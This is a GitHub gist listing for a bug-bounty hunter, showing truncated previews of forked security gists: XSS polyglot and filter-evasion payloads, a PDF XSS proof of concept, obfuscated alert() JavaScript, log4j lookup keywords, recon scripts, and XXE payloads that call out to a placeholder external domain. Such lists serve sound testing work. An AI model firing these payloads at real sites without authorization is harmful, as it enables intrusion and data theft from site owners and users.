Nasur Ullah Spy0x7
π’
Spy0x7
/ urlscan.sh
Created
February 21, 2022 08:50
— forked from bendtheory/urlscan.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F $1 | sort -u |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'"> | |
| ';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT> | |
| ""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</ | |
| h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$ | |
| \';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88, | |
| 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68), | |
| 83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT> | |
| ';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){// |
Spy0x7
/ demon
Created
December 23, 2021 12:14
— forked from iustin24/demon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 00001 | |
| 00002 | |
| 00003 | |
| 00004 | |
| 00005 | |
| 00006 | |
| 00007 | |
| 00008 | |
| 00009 | |
| 00010 |
Spy0x7
/ log4j-keywords
Created
December 12, 2021 03:40
— forked from bugbountynights/log4j-keywords
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${ctx:loginId} | |
| ${map:type} | |
| ${filename} | |
| ${date:MM-dd-yyyy} | |
| ${docker:containerId} | |
| ${docker:containerName} | |
| ${docker:imageName} | |
| ${env:USER} | |
| ${event:Marker} | |
| ${mdc:UserId} |
Spy0x7
/ wordlist_from_js.sh
Created
November 14, 2021 16:58
— forked from seqrity/wordlist_from_js.sh
Make wordlist from js files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| ## This script fetch js files from a domain name and make a wordlist by words in js files | |
| ##### Install requirements ##### | |
| ##### Before running this script you should install Go ##### | |
| ## Install subjs (https://github.com/lc/subjs) | |
| GO111MODULE=on go get -u -v github.com/lc/subjs |
Spy0x7
/ poc.js
Created
October 3, 2021 16:28
— forked from andripwn/poc.js
PDF Bypass - Cross-site Scripting (XSS)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
Spy0x7
/ lol.html
Created
September 26, 2021 07:10
— forked from ignis-sec/lol.html
alert() without letters or numbers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| /* | |
| γ±='',γ³=γ±,α=γ±+{},α=γ±+[][[]],γ±+=[γ±==γ±],γ³+=[!γ±],α=+[],α=+!+[],α=α+α,α=α+α,α=α+α,α+=α+α+α,α=α+α,α=α[α+α],α=α[α],α=γ±[α],α²=γ±[α],α³=α+α+α[α]+γ³[α]+α²+α+α[α]+α+α²+α+γ±[α],α°=[][α³][α³],α=''+α°,α=γ³[α]+γ³[α]+γ±[α]+α+α²+α[α]+α[α],α°`α³${α}``` | |
| */ | |
| γ±='' | |
| γ³=γ± //'' | |
| α=γ±+{} //'[object Object]' <- '' + [object Object] | |
| α=γ±+[][[]] //'undefined' <- '' + undefined |
Spy0x7
/ xxe-payloads.txt
Created
September 25, 2021 11:18
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
Spy0x7
/ AWS API calls that return credentials.md
Created
September 25, 2021 11:17
— forked from kmcquade/AWS API calls that return credentials.md
AWS API calls that return credentials
Spy0x7
/ alert.js
Created
September 17, 2021 12:23
— forked from yassineaboukir/alert.js
Ways to alert(document.domain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |